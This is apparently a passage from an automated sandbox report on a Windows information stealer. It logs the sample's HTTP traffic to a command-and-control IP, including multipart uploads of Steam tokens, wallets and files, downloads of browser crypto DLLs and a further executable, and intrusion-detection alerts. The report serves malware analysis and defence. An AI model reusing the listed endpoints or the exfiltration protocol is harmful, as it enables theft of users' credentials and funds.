                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCGDBKEGHIEBGDBFHDHost: 185.235.128.16Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 2d 2d 0d 0a Data Ascii: ------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="file"------CBGCGDBKEGHIEBGDBFHD--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGHHost: 185.235.128.16Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="file"------BGCFBGDHJKFIEBFIECGH--
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/freebl3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/mozglue.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/msvcp140.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/nss3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/softokn3.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /4bdcdc3545a160aa/vcruntime140.dll HTTP/1.1Host: 185.235.128.16Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKFHost: 185.235.128.16Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.235.128.16Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"wallets------AEBGHDBKEBGIDHJJEHCA--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 185.235.128.16Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"wallets------AEBGHDBKEBGIDHJJEHCA--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEHHost: 185.235.128.16Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 2d 2d 0d 0a Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="message"files------IJEBKKEGDBFIIEBFHIEH--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.235.128.16Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file"------HDAKFCGIJKJKFHIDHIII--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHIHost: 185.235.128.16Content-Length: 113543Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 185.235.128.16Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="message"ybncbhylepme------IJJJEBFHDBGIECBFCBKJ--
                    Source: global trafficHTTP traffic detected: POST /562c1eb14955c897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFCHost: 185.235.128.16Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHCGDGIEBKJKFHJJKFC--
                    Source: Joe Sandbox ViewIP Address: 87.106.236.48 87.106.236.48
                    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                    Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.235.128.16:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49754 -> 185.235.128.16:80
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49755
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49761 -> 87.106.236.48:443
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49765
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.235.128.16
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,EntryPoint,InternetCloseHandle,0_2_00405000
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=34N3nfbc+uLWcc3&MD=GLsAeukB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /adjunts/chrome_131.exe HTTP/1.1Host: osteo9.esalnuvol.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=34N3nfbc+uLWcc3&MD=GLsAeukB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
